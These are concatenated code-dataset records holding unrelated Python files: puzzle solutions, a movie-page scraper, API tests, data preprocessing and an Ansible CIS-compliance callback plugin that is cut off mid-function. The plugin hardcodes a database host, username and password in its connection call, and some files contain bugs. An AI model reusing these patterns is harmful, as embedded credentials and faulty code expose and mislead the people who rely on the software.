c.isdigit())\n new_phone_number = int(clean_phone_number) + 1\n update_client({'telephone1': new_phone_number}, client['contactid'])\n return redirect('/')\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"196751206","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# animated_image.py\n#\n# Copyright 2012 Emil \n#\n\nfrom animated_image import AnimatedImage\nfrom random import randint\n\nclass AnimatedNumber(AnimatedImage):\n def __init__(self, canvas, x, y, update_time, value, images, min = 0, max = 9):\n AnimatedImage.__init__(self, canvas, x, y, update_time, images)\n self.min = min\n self.max = max\n self.value = value;\n self.run_animation = False\n self.image_value = value\n\n def update(self, time):\n if self.run_animation:\n self.current_timer -= time\n if self.current_timer < 0:\n # Don't repeat the same value\n new_value = randint(self.min, self.max)\n while self.image_value == new_value:\n new_value = randint(self.min, self.max)\n\n self.image_value = new_value\n\n self.set_image(self.image_value)\n self.current_timer = self.update_time\n\n def set_image(self, value):\n self.image = self.images[value]\n self.canvas.itemconfig(self.canvas_image, image=self.image)\n\n def set_value(self, value):\n self.value = value\n if not self.run_animation:\n self.image_value = value\n self.set_image(self.image_value)\n\n def animate(self, bool):\n self.run_animation = bool\n if not bool:\n self.image = self.images[self.value]\n self.canvas.itemconfig(self.canvas_image, image=self.image)\n","sub_path":"lotto/animated_number.py","file_name":"animated_number.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"435498616","text":"#!/usr/bin/python\nimport sys\n\n\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n this.val = val\n this.left, this.right = None, None\nDefinition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\"\"\"\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n # @param {TreeNode} root the root of binary tree\n # @return {ListNode[]} a lists of linked list\n def binaryTreeToLists(self, root):\n # Write your code here\n if not root:\n return []\n result = []\n q = [root]\n while q:\n tmp = []\n tmp_l = ListNode(0)\n p = tmp_l\n for n in q:\n p.next = ListNode(n.val)\n p = p.next\n if n.left:\n tmp.append(n.left)\n if n.right:\n tmp.append(n.right)\n result.append(tmp_l.next)\n q = tmp\n return result\n\ndef main():\n aa = Solution()\n return 0\n\nif __name__ == \"__main__\":\n sys.exit(main())","sub_path":"LintCode/convertBinaryTreeToLinkedListsByDepth.py","file_name":"convertBinaryTreeToLinkedListsByDepth.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"139524860","text":"import Console\n\nc = Console.getconsole()\nc.cursor(0)\n\nc.title(\"Console Example\")\n\nc.text(0, 0, \"here's some white text on white background\", 0x1f)\nc.text(10, 5, \"line five, column ten\")\n#c.getchar()\nc.pos(0, 6)\nc.cursor(1)\nwhile True:\n b = c.get()\n print(b.char)\n print(b.keycode)\n print(b.type)\n #print(b.keysym)\n print(\"\")\n","sub_path":"Python/Python scripts/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"499816537","text":"'''\n@auther: Samaneh\n'''\nimport pandas as pd\nimport numpy as np\nimport csv\n\n#################################################################################\n\ndef lohExtraction(cnv_df):\n for i in range(0,161927793):\n d = str(cnv_df[\"GENE_NAME\"][i])\n if \"_ENST\" in d:\n new = d.split(\"_ENST\")[0]\n cnv_df[\"GENE_NAME\"][i] = new \n\ndef handler():\n\n cnv_df = pd.read_csv(\"/home/jozashoori/External/Data/COSMIC/COSMIC_completeGeneExpression.csv\", low_memory=False)\n lohExtraction (cnv_df) \n cnv_df.to_csv(\"/home/jozashoori/External/Data/COSMIC/Preprocessed_MayJune/ThirdPreprocessed_gexp_lungCancer.csv\")\n\n\nif __name__ == \"__main__\":\n handler()","sub_path":"COSMIC_geneExpression_preprocessing.py","file_name":"COSMIC_geneExpression_preprocessing.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"165379343","text":"import urllib\nimport re\n\nfrom flask import g, request\n\n_slugify_strip_re = re.compile(r'[^\\w\\s-]')\n_slugify_hyphenate_re = re.compile(r'[-\\s]+')\n\nTITLES = {\n 'rep': 'Representative',\n 'sen': 'Senator',\n}\nPARTIES = {\n 'r': 'Republican',\n 'd': 'Democrat',\n 'i': 'Independent',\n}\nSTATES = {\n 'al': 'Alabama',\n 'ak': 'Alaska',\n 'az': 'Arizona',\n 'ar': 'Arkansas',\n 'ca': 'California',\n 'co': 'Colorado',\n 'ct': 'Connecticut',\n 'de': 'Delaware',\n 'fl': 'Florida',\n 'ga': 'Georgia',\n 'hi': 'Hawaii',\n 'id': 'Idaho',\n 'il': 'Illinois',\n 'in': 'Indiana',\n 'ia': 'Iowa',\n 'ks': 'Kansas',\n 'ky': 'Kentucky',\n 'la': 'Louisiana',\n 'me': 'Maine',\n 'md': 'Maryland',\n 'ma': 'Massachussetts',\n 'mi': 'Michigan',\n 'mn': 'Minnesota',\n 'ms': 'Mississippi',\n 'mo': 'Missouri',\n 'mt': 'Montana',\n 'ne': 'Nebraska',\n 'nv': 'Nevada',\n 'nh': 'New Hampshire',\n 'nj': 'New Jersey',\n 'nm': 'New Mexico',\n 'ny': 'New York',\n 'nc': 'North Carolina',\n 'nd': 'North Dakota',\n 'oh': 'Ohio',\n 'ok': 'Oklahoma',\n 'or': 'Oregon',\n 'pa': 'Pennsylvania',\n 'ri': 'Rhode Island',\n 'sc': 'South Carolina',\n 'sd': 'South Dakota',\n 'tn': 'Tennessee',\n 'tx': 'Texas',\n 'ut': 'Utah',\n 'vt': 'Vermont',\n 'va': 'Virginia',\n 'wa': 'Washington',\n 'wv': 'West Virginia',\n 'wi': 'Wisconsin',\n 'wy': 'Wyoming',\n 'dc': 'District of Columbia',\n 'as': 'American Samoa',\n 'gu': 'Guam',\n 'mp': 'Northern Mariana Islands',\n 'pr': 'Puerto Rico',\n 'vi': 'U.S. Virgin Islands',\n 'fm': 'Federated States of Micronesia',\n 'mh': 'Marshall Islands',\n 'pw': 'Palau',\n}\nBILL_TYPES = {\n 'hr': 'House Bill',\n 'hres': 'House Resolution',\n 'hjres': 'House Joint Resolution',\n 'hcres': 'House Concurrent Resolution',\n 's': 'Senate Bill',\n 'sres': 'Senate Resolution',\n 'sjres': 'Senate Joint Resolution',\n 'scres': 'Senate Concurrent Resolution',\n}\n\n\ndef bill_type_for(abbr):\n abbr = re.split(r'([a-zA-Z.\\-]*)', abbr)[1].lower().replace('.', '')\n return BILL_TYPES.get(abbr)\n\n\ndef party_for(abbr):\n return PARTIES.get(abbr.lower(), abbr)\n\n\ndef rep_title_for(abbr):\n return TITLES.get(abbr.lower(), 'Representative')\n\n\ndef state_for(abbr):\n return STATES.get(abbr.lower())\n\n\ndef bill_number_for(abbr):\n try:\n return re.split(r'([a-zA-Z.\\-]*)', abbr)[2]\n except:\n return None\n\n\ndef digitless_querystring():\n querydict = request.values.to_dict()\n try:\n querydict = delattr(querydict, 'Digits')\n except AttributeError:\n pass\n\n return urllib.urlencode(querydict)\n\n\ndef digitless_url():\n return \"%s?%s\" % (request.path, digitless_querystring())\n\n\ndef log_redirect_url():\n write_context('redirect_to', \"%s?%s\" % (request.path, digitless_querystring()))\n\n\ndef reset_redirect_url():\n flush_context('redirect_to')\n\n\ndef read_context(key, default=None):\n try:\n return g.call['context'][key]\n except:\n return default\n\n\ndef write_context(key, value):\n try:\n g.call['context'][key] = value\n return True\n except:\n return False\n\n\ndef flush_context(key):\n try:\n del g.call['context'][key]\n return True\n except:\n return False\n\n\ndef get_lang(**kwargs):\n return read_context('language', kwargs.get('default', None))\n\n\ndef get_zip():\n return read_context('zipcode')\n\n\ndef slugify(value):\n \"\"\"\n Normalizes string, converts to lowercase, removes non-alpha characters,\n and converts spaces to hyphens.\n\n From Django's \"django/template/defaultfilters.py\".\n \"\"\"\n import unicodedata\n if not isinstance(value, unicode):\n value = unicode(value)\n value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')\n value = unicode(_slugify_strip_re.sub('', value).strip().lower())\n return _slugify_hyphenate_re.sub('-', value)\n","sub_path":"calloncongress/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"396986738","text":"#!/usr/bin/python3\n\"\"\" Contains function that returns a list of integer lists\n representing Pascal's triangle of n \"\"\"\n\n\ndef pascal_triangle(n):\n if n <= 0:\n return []\n\n tri = []\n for row in range(n):\n tri.append([1])\n for i in range(1, row):\n tri[row].append(tri[row - 1][i - 1] + tri[row - 1][i])\n if row is not 0:\n tri[row].append(1)\n return tri\n","sub_path":"0x0B-python-input_output/14-pascal_triangle.py","file_name":"14-pascal_triangle.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"142073659","text":"#A-T\r\n#G-C\r\n\r\n\r\ndef main(arr):\r\n for i in arr:\r\n if i=='A':\r\n i='T'\r\n elif i=='a':\r\n i='t'\r\n elif i=='G':\r\n i='C'\r\n elif i=='g':\r\n i='c'\r\n elif i=='T':\r\n i='A'\r\n elif i=='t':\r\n i='a'\r\n elif i=='C':\r\n i='G'\r\n elif i=='c':\r\n i='g'\r\n print(i,end=\"\")\r\n\r\nif __name__==\"__main__\":\r\n n=int(input(\"Enter the length of the string:\"))\r\n x = [str(input(\"Enter the string:\")) for j in range(n)]\r\n print(\"Original String:\",str(x))\r\n y = x[::-1]\r\n print(\"Final output:\")\r\n main(y)\r\n\r\n\r\n\r\n\r\n","sub_path":"Necleotide Sequence.py","file_name":"Necleotide Sequence.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"492769124","text":"# CS60012 A8\n# task1\n# Ravi Pratap Singh (20CS60R60)\n\nimport urllib.request, urllib.error, urllib.parse\nimport os\nimport codecs\nimport re\nimport sys\n\ndef main():\n\t#getting links from text files\n\tif not os.path.exists(\"./HTML\"): \n\t\tos.mkdir(\"./HTML\")\n\tinputFileName = \"rotten tomatoes movie genre link.txt\"\n\twith open(inputFileName) as f:\n\t\tcontent = f.readlines()\n\tcontent = [x.strip() for x in content] \n\tgenre_name=\"\"\n\tgenre_dict = {}\n\tfor url in content:\n\t\tif url.endswith(\"/\"):\n\t\t\turl.strip()\n\t\t\tgenre_dict[genre_name] = url\n\t\telif url[0].isnumeric():\n\t\t\t\ttemp=url.split(\".\")\n\t\t\t\tgenre_name=temp[1][:-1].strip()\n\t\telse:\n\t\t\tcontinue\n\n\t#prompt user to enter gere\t\t\n\twhile True:\n\t\tprint(\"Genre list:\")\n\t\tfor g in genre_dict.keys():\n\t\t\tprint(g)\n\t\tgenre = str(input(\"Enter the genre(case sensitive): \") )\n\t\tgenre_path = \"./HTML/\" + genre + \".html\"\n\t\tif not os.path.isfile(genre_path):\n\t\t\tprint(f'Fetching web page: {genre_dict[genre]}')\n\t\t\tresponse = urllib.request.urlopen(genre_dict[genre])\n\t\t\twebContent = response.read()\n\t\t\tf = open(genre_path, 'wb')\n\t\t\tf.write(webContent)\n\t\t\tf.close()\n\t\t\n\t\tf=codecs.open(genre_path, mode=\"r\")\n\t\ts=f.read()\n\t\tall_urls={}\n\n\t\t#regex for getting top 100 movies\n\t\tregex = r\"\\ba\\shref=\\\"\\/m\\/\\b([a-zA-Z0-9\\-_]+)\\\"\\sclass=\\\"unstyled articleLink\\\">[^\\\\n*]\\s*([a-zA-Z0-9.,:\\-()ÄÖÜäöüâÂôÔêÊ[^\\'\\\"\\s+]+]*)\"\n\t\tmatches = re.finditer(regex, s, re.MULTILINE)\n\n\t\t#printing top 100 movies\n\t\tfor matchNum, match in enumerate(matches, start=1):\n\t\t\tall_urls[match.group(2)] = match.group(1)\n\t\tfor key in all_urls.keys():\n\t\t\tprint(key)\n\n\t\t#prompt user to enter movie name\n\t\twhile True:\n\t\t\tmov = input(\"SELECT MOVIE FROM THE ABOVE LIST(case sensitive):\") \n\t\t\tif not os.path.exists(\"./MOVIE\"): \n\t\t\t\tos.mkdir(\"./MOVIE\")\n\n\t\t\tmov_url = \"https://www.rottentomatoes.com/m/\" + str(all_urls[mov])\n\t\t\tprint(f'Fetching web page: {mov_url}')\n\t\t\ttry:\n\t\t\t\tresponse_mov = urllib.request.urlopen(mov_url)\n\t\t\t\twebContent_mov = response_mov.read()\n\t\t\texcept Exception as e:\n\t\t\t\tprint(e)\n\t\t\t\tcontinue\t\t\t\n\t\t\tmov_name = \"./MOVIE/\" + genre + \";\" + mov + \".html\"\n\t\t\tf = open(mov_name, 'wb')\n\t\t\tf.write(webContent_mov)\n\t\t\tf.close()\n\t\t\tprint(\"Downloaded Movie \",mov,\" of \",genre)\n\t\t\twant = input(\"Want to continue on same genre (y/n)> \")\n\t\t\tif(want == 'y'):\n\t\t\t\tcontinue\n\t\t\telif(want == 'n'):\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint(\"Enter valid code\")\n\t\t\t\tsys.exit(10)\n\t\twant2 = input(\"Want to continue more (y/n)> \")\n\t\tif(want2 == 'y'):\n\t\t\tcontinue\n\t\telif(want2 == 'n'):\n\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"Enter valid code\")\n\t\t\tsys.exit(10)\n\nif __name__==\"__main__\":\n\tmain()","sub_path":"A8/A8_20CS60R60/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"9278026","text":"import allure\nfrom config import helpers\n\n\n@allure.feature(\"Check Post is Liked\")\n@allure.story(\"Like post and check it is liked\")\ndef test_like_post_and_check_liked(get_post_id):\n liked = 1\n post_id = get_post_id\n helpers.send_request('/likes.add', item_id=post_id)\n result = helpers.send_request('/likes.isLiked', item_id=post_id)\n with allure.step(\"Post is in Liked for user\"):\n assert helpers.check_response(result)['liked'] == liked, \\\n f\"Post is not in liked. Result: {result}\"\n\n\n@allure.feature(\"Check Post is Liked\")\n@allure.story(\"Check if post is liked with wrong user id\")\ndef test_liked_for_user_with_wrong_id(get_post_id):\n wrong_id = 12112342\n post_id = get_post_id\n result = helpers.send_request('/likes.isLiked', item_id=post_id, user_id=wrong_id, owner_id=wrong_id)\n with allure.step(\"Access denied error\"):\n assert 'Access denied' in helpers.check_error(result)['error_msg'], \\\n f\"Error message is incorrect. Result: {result}\"\n","sub_path":"tests/test_likes_is_liked.py","file_name":"test_likes_is_liked.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"123029236","text":"# problem one\n\n\ndef get_lines_from_input_file(filename):\n rows = []\n with open(filename) as f:\n for line in f:\n rows.append(line)\n\n return rows\n\n\ndef find_answers(rows):\n answer = 0\n for element in rows:\n operator = element[0]\n value = element[1:]\n if operator == \"+\":\n answer += int(value)\n elif operator == \"-\":\n answer -= int(value)\n else:\n print(operator, value)\n return answer\n\n\ndef main():\n print(find_answers(get_lines_from_input_file('input_1.txt')))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"2018/Problem 1/problem_1_frequency_delays.py","file_name":"problem_1_frequency_delays.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"648194431","text":"from __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nimport os\nimport time\nimport json\nimport socket\nimport psycopg2\nimport logging\nimport math\nimport jinja2\nimport re\nimport sys\n\nfrom ansible import context\nfrom json import JSONEncoder\nfrom ansible.utils.path import makedirs_safe\nfrom ansible.module_utils._text import to_bytes\nfrom ansible.module_utils.common._collections_compat import MutableMapping\nfrom ansible.module_utils.basic import get_distribution, get_exception\nfrom ansible.parsing.ajson import AnsibleJSONEncoder\nfrom ansible.plugins.callback import CallbackBase\nfrom datetime import datetime\n\nclass Host:\n def __init__(self):\n self.distribution = \"\"\n self.distribution_version = \"\"\n self.distribution_major_version = \"\"\n self.os_family = \"\"\n self.hostname = \"\"\n self.ipv4 = \"\"\n self.tasks = {}\n self.is_audit = True\n\nclass Task:\n def __init__(self):\n self.rule = \"\"\n self.section = \"\"\n self.scored = \"\"\n self.level = \"\"\n self.profiles = []\n self.headings = {}\n self.rules = {}\n self.status = \"\"\n #self.isManual = False\n \nclass Heading:\n def __init__(self):\n self.rule = \"\"\n self.section = \"\"\n\nclass Rule:\n def __init__(self):\n self.section = \"\"\n self.description = \"\"\n self.info = \"\"\n self.output = \"\"\n self.state = \"\"\n\nclass CISEncoder(JSONEncoder):\n def default(self, o):\n return o.__dict__\n\n# ==========================================================\n\nclass CallbackModule(CallbackBase):\n CALLBACK_VERSION = 2.0\n my_objects = []\n\n TIME_FORMAT = \"%b %d %Y %H:%M:%S\"\n MSG_FORMAT = \"%(now)s - %(category)s - %(data)s\\n\\n\"\n\n def __init__(self):\n self.disabled = False\n super(CallbackModule, self).__init__() \n self._options = context.CLIARGS\n \n self.is_remediate = False\n self.last_task_name = None\n self.playbook_name = None\n self._play = \"\"\n self.node_task_result = {}\n self.check_mode = False\n self.transaction_per_node = {}\n self.tags = []\n self.tasks_per_host = {}\n\n self.logger = logging.getLogger(__name__)\n self.logger.setLevel(logging.DEBUG)\n self.ignore_tag = \"\"\n\n # create a file handler \n output_file_handler = logging.FileHandler(\"/home/ubuntu/automation/output/output.log\", 'w')\n stdout_handler = logging.StreamHandler(sys.stdout)\n\n # create a logging format\n #formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n #output_file_handler.setFormatter(formatter)\n #stdout_handler.setFormatter(formatter)\n\n # add the file handler to the logger\n self.logger.addHandler(output_file_handler)\n self.logger.addHandler(stdout_handler)\n\n self.start_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S') \n\n def _all_vars(self, host=None, task=None):\n return self._play.get_variable_manager().get_vars(\n play=self._play,\n host=host,\n task=task\n )\n\n\n def log(self, result, category):\n #self.logger.debug(\"************************************************\")\n self.logger.debug(\"Task>: %s\", self.last_task_name)\n self.logger.debug(\"Status>: %s\", category)\n #print(\"ignore_tag: {0}\".format(self.ignore_tag))\n\n if category == \"OK\" or category == \"CHANGED\":\n self.logger.debug(\"Valid Task\")\n else:\n self.logger.debug(\"Ignored task\")\n return\n\n #if self.ignore_tag == \"HANDLER\":\n # self.logger.debug(\"ERRORRRRRRRRRRR\")\n\n host_name = result._host.get_name()\n \n if('moveit' in result._result):\n #if len(self.tags) > 0 and (\"AUDIT\" in self.tags or \"REMEDIATE\" in self.tags) and self.ignore_tag != \"HANDLER\":\n print(\"Inside\")\n values = self.last_task_name.split(\"|\")\n main_section = values[0]\n main_rule = values [1]\n \n task = Task()\n task.rule = main_rule\n task.section = main_section\n\n main_scored = \"NA\"\n if \"not_scored\" in self.tags:\n main_scored = \"Not Scored\"\n elif \"scored\" in self.tags:\n main_scored = \"Scored\"\n else:\n main_scored = \"NA\"\n task.scored = main_scored\n task.level = len(main_section.split(\".\")) - 1\n\n profiles = []\n task.profiles = profiles\n if \"Level1_Workstation\" in self.tags:\n profiles.append(\"Level1_Workstation\")\n if \"Level2_Workstation\" in self.tags:\n profiles.append(\"Level2_Workstation\")\n if \"Level1_Server\" in self.tags:\n profiles.append(\"Level1_Server\")\n if \"Level2_Server\" in self.tags:\n profiles.append(\"Level2_Server\") \n \n headings = {}\n task.headings = headings\n for tag in self.tags: \n if \"|\" in tag:\n values = tag.split(\"|\")\n \n heading = Heading()\n heading_section = values[0] \n heading.section = heading_section\n heading.rule = values[1]\n heading.level = len(heading_section.split(\".\")) - 1\n headings[heading_section] = heading \n\n rule = Rule()\n if('moveit' in result._result):\n output = result._result['moveit']\n rule.section = output['section']\n rule.description = output['description']\n rule.info = output['info']\n rule.output = output['cmd_output']\n rule.state = output['state']\n #rule.isManual = output['isManual']\n \n self.logger.debug(\"Current Status: %s\", output['state'])\n\n host_result = self.tasks_per_host[host_name]\n # host_result.is_audit = is_audit\n host_result_tasks = host_result.tasks\n\n if main_section in host_result_tasks:\n primary_task = host_result_tasks[main_section]\n rules = primary_task.rules\n rules[len(rules)] = rule\n\n status = []\n for rule in rules:\n status.append(rules[rule].state)\n\n if \"manual\" in status:\n primary_task.status = \"manual\"\n elif \"failed\" in status:\n primary_task.status = \"failed\"\n elif \"changed\" in status:\n primary_task.status = \"changed\"\n elif \"passed\" in status:\n primary_task.status = \"passed\"\n else:\n primary_task.status = \"error\"\n\n if category == \"FAILED\":\n primary_task.status = \"error\"\n\n # for rule in rules:\n # if rules[rule].isManual:\n # primary_task.isManual = True\n # break\n\n self.logger.debug(\"StatusIF: %s\", status)\n\n else:\n self.logger.debug(\"StatusElse: %s\", rule.state)\n if category == \"FAILED\":\n task.status = \"error\" \n # task.isManual = rule.isManual\n task.status = rule.state \n task.rules[0] = rule\n host_result_tasks[main_section] = task\n\n self.logger.debug('**************** END OF TASK *******************')\n\n def set_options(self, task_keys=None, var_options=None, direct=None):\n super(CallbackModule, self).set_options(task_keys=task_keys, var_options=var_options, direct=direct)\n\n def create_host(self, result):\n host_name = result._host.get_name()\n\n if host_name not in self.tasks_per_host:\n hostname = self._all_vars()['hostvars'][host_name][\"ansible_hostname\"]\n ipv4 = self._all_vars()['hostvars'][host_name][\"ansible_default_ipv4\"][\"address\"]\n distribution = self._all_vars()['hostvars'][host_name][\"ansible_distribution\"]\n distribution_major_version = self._all_vars()['hostvars'][host_name][\"ansible_distribution_major_version\"]\n distribution_version = self._all_vars()['hostvars'][host_name][\"ansible_distribution_version\"]\n os_family = \"\"\n tags = self._options['tags']\n \n # os_family = distribution_version + \" \" + distribution_version\n linux_family = self._all_vars()['vars']['linux']\n windows_family = self._all_vars()['vars']['windows']\n\n is_linux = distribution in linux_family\n is_windows = distribution in windows_family\n\n if is_linux:\n os_family = \"LINUX\"\n elif is_windows:\n os_family = \"WINDOWS\"\n else:\n os_family = \"UNKNOWN\"\n\n host = Host()\n host.distribution = distribution\n host.distribution_major_version = distribution_major_version\n host.distribution_version = distribution_version\n host.os_family = os_family\n host.hostname = hostname\n host.ipv4 = ipv4\n if 'REMEDIATE' in tags:\n host.is_audit = True\n else:\n host.is_audit = False\n\n self.tasks_per_host[host_name] = host \n\n def v2_playbook_on_handler_task_start(self, task): \n self.ignore_tag = \"HANDLER\"\n pass\n\n def v2_runner_on_ok(self, result, **kwargs):\n tags = result._task.tags \n\n changed = ('changed' in result._result and result._result['changed'])\n ok_or_changed = 'OK'\n\n if changed:\n ok_or_changed = 'CHANGED' # TODO testing purpose, neeed to remove later\n\n self.create_host(result)\n\n if ('redhat_version' in tags): \n host_name = result._host.get_name()\n host = self.tasks_per_host[host_name] \n host.distribution = result._result['stdout'] \n self.log(result, ok_or_changed)\n\n def v2_runner_on_failed(self, result, ignore_errors=False):\n self.create_host(result)\n print(\"ERROR\")\n self.log(result, 'FAILED')\n\n def v2_runner_on_skipped(self, result, ignore_errors=False):\n self.create_host(result)\n self.log(result, 'SKIPPED')\n\n def v2_runner_item_on_skipped(self, result, ignore_errors=False):\n self.create_host(result)\n self.log(result, 'SKIPPED')\n\n def v2_runner_on_unreachable(self, result):\n self.create_host(result)\n self.log(result, 'UNREACHABLE')\n\n def v2_runner_on_async_failed(self, result):\n self.create_host(result)\n print(\"ERROR\")\n self.log(result, 'ASYNC_FAILED')\n\n\n def v2_playbook_on_task_start(self, task, **kwargs):\n self.last_task_name = task.get_name()\n #self.tags = task._attributes['tags']\n self.is_remediate = self._all_vars()['vars']['is_remediate']\n self.tags = task.tags\n\n def playbook_on_setup(self):\n #print(\"\\n{0}\".format('GATHERING FACTS'))\n pass\n\n def set_play_context(self, play_context):\n self.play_context = play_context\n\n def v2_playbook_on_play_start(self, play):\n self._play = play\n playbook = self._all_vars()['vars']['playbook_dir']\n\n index = playbook.rfind('/')+1\n\n self.playbook_name = playbook[index:]\n if self.play_context.check_mode:\n self.check_mode = True\n\n\n def playbook_on_import_for_host(self, host, imported_file):\n pass\n\n def playbook_on_not_import_for_host(self, host, missing_file):\n pass\n\n def v2_playbook_on_start(self, playbook):\n pass\n\n def v2_playbook_on_stats(self, stats): \n \"\"\"Complete: Flush log to database\"\"\"\n hosts = stats.processed.keys()\n\n # print(\">>>>>>>>>>>>>>>>>>>>>>>>>>>\") \n \n cisJSONData = json.dumps(self.tasks_per_host, indent=4, cls=CISEncoder)\n self.html_generator(cisJSONData)\n # self.logger.info('Return result: \\n%s', cisJSONData)\n\n # print(\"------------------------------------------------\")\n\n for h in hosts:\n t = stats.summarize(h)\n msg = \"Host: %s, ok: %d, failures: %d, unreachable: %d, changed: %d, skipped: %d\" % (\n h, t['ok'], t['failures'], t['unreachable'], t['changed'], t['skipped'])\n print(\"\\n{0}\".format(msg))\n\n #self.flush_to_database(hosts, is_compliant)\n self.logger.debug(\"============= Completed Successfully =============\")\n\n def html_generator(self, cisJSONData):\n self.logger.debug(\"Generating report....\")\n data = json.loads(cisJSONData)\n\n for host in data:\n list_body = []\n tasks = data[host][\"tasks\"]\n is_remediate = self.is_remediate # TODO\n \n pass_count = 0\n fail_count = 0 \n error_count = 0\n changed_count = 0\n manual_count = 0\n\n\n for i in tasks:\n rules = tasks[i][\"rules\"]\n status = tasks[i][\"status\"]\n #isManual = tasks[i][\"isManual\"]\n scored = tasks[i][\"scored\"]\n profile = tasks[i][\"profiles\"]\n\n for j in rules:\n rule = rules[j]\n list_body.append(rule[\"section\"])\n list_body.append(rule[\"description\"] + \" (\" + scored + \")\" )\n list_body.append(rule[\"info\"])\n list_body.append(rule[\"state\"])\n list_body.append(status)\n self.logger.debug(\"Task: %s, Status: %s\",rule[\"section\"], rule[\"state\"])\n \n if status == \"passed\":\n pass_count += 1\n elif status == \"failed\":\n fail_count += 1\n elif status == \"changed\":\n changed_count += 1\n elif status == \"manual\":\n manual_count += 1\n else:\n error_count += 1\n\n list_body.append(rule[\"output\"])\n list_body.append(profile)\n\n # if isManual:\n # manual_count += 1\n # list_body.append(\"manual\")\n # else:\n # list_body.append(\"not-manual\")\n\n # pass_count = list_body.count(\"Compliant\")\n # fail_count = list_body.count(\"Non-compliant\")\n # error_count = list_body.count(\"Error\")\n # manual_count = list_body.count(\"Manual\")\n\n total = pass_count + fail_count + error_count + changed_count\n compliant_count = pass_count + manual_count\n non_compliant_count = fail_count + error_count\n percentageVal = math.floor((compliant_count/total)*100)\n percentage = str(percentageVal)+'%'\n status = \"\"\n if percentageVal == 100:\n status += \"Passed\"\n else:\n status += \"Failed\"\n\n i = 0\n list_of_lists = []\n while i < len(list_body):\n list_of_lists.append(list_body[i:i+7])\n i += 7\n\n templateFile = \"template.html\"\n script_path = os.path.dirname(os.path.abspath(__file__))\n environment = jinja2.Environment(loader=jinja2.FileSystemLoader(script_path))\n\n template = environment.get_template(templateFile)\n html = template.render(machine_hostname=data[host][\"hostname\"], \n machine_ip_address=data[host][\"ipv4\"], \n machine_distro=data[host][\"distribution\"], \n machine_time=self.start_time, \n machine_number_of_policies=total, \n machine_compliant=compliant_count, \n machine_non_compliant=non_compliant_count, \n machine_compliance_rate=percentage, \n machine_status=status, \n machine_manual=manual_count,\n table_items=list_of_lists,\n is_remediate=is_remediate)\n fileName = data[host][\"hostname\"]\n fileName = fileName + \"_remediate\" if is_remediate else fileName + \"_audit\"\n self.logger.debug(fileName)\n with open(\"/home/ubuntu/automation/output/\"+fileName + \"_report.html\", \"w\") as report:\n report.write(html)\n\n def flush_to_database(self, hosts, is_compliant):\n connection = psycopg2.connect(\n host='10.10.14.10', database='automation', user='postgres', password='P@ssw0rd')\n cursor = connection.cursor()\n print(\"Playbook: {}\".format(self.playbook_name))\n playbook_name = self.playbook_name\n # PLAYBOOK\n sql_select_query_for_play = 'SELECT id FROM playbook WHERE name=%s'\n cursor.execute(sql_select_query_for_play, (playbook_name,))\n playbook_id = cursor.fetchone()[0]\n print(\"Playbook ID: {0}\".format(playbook_id))\n\n #HISTORY\n sql_insert_query_for_run_history = 'INSERT INTO run_history (playbook_id, run_date) VALUES (%s, now()) RETURNING id'\n cursor.execute(sql_insert_query_for_run_history, (playbook_id,))\n history_id = cursor.fetchone()[0]\n print(\"History ID:::: {0}\".format(history_id))\n\n for h in hosts:\n remote_node = self.node_task_result[h]\n ruleNodes = remote_node.rule_node # set of section_rules\n distribution = remote_node.distribution\n distribution_version = remote_node.distribution_version\n distribution_major_version = remote_node.distribution_major_version\n print(\"\\ndistribution: {0}\".format(distribution))\n print(\"\\ndistribution_version: {0}\".format(distribution_version))\n print(\"\\ndistribution_major_version: {0}\".format(distribution_major_version))\n\n # OS\n sql_select_query_for_os_id = 'INSERT INTO os(playbook_id, distribution, distribution_version, distribution_major_version, os_family) values (%s, %s, %s, %s, %s) ON CONFLICT (distribution, os_family) DO UPDATE SET distribution = EXCLUDED.distribution RETURNING id' \n cursor.execute(sql_select_query_for_os_id, (playbook_id, remote_node.distribution, remote_node.distribution_version, remote_node.distribution_major_version, remote_node.os_family,))\n os_id = cursor.fetchone()[0]\n print(\"OS ID:::: {0}\".format(os_id))\n print(\"HostName: 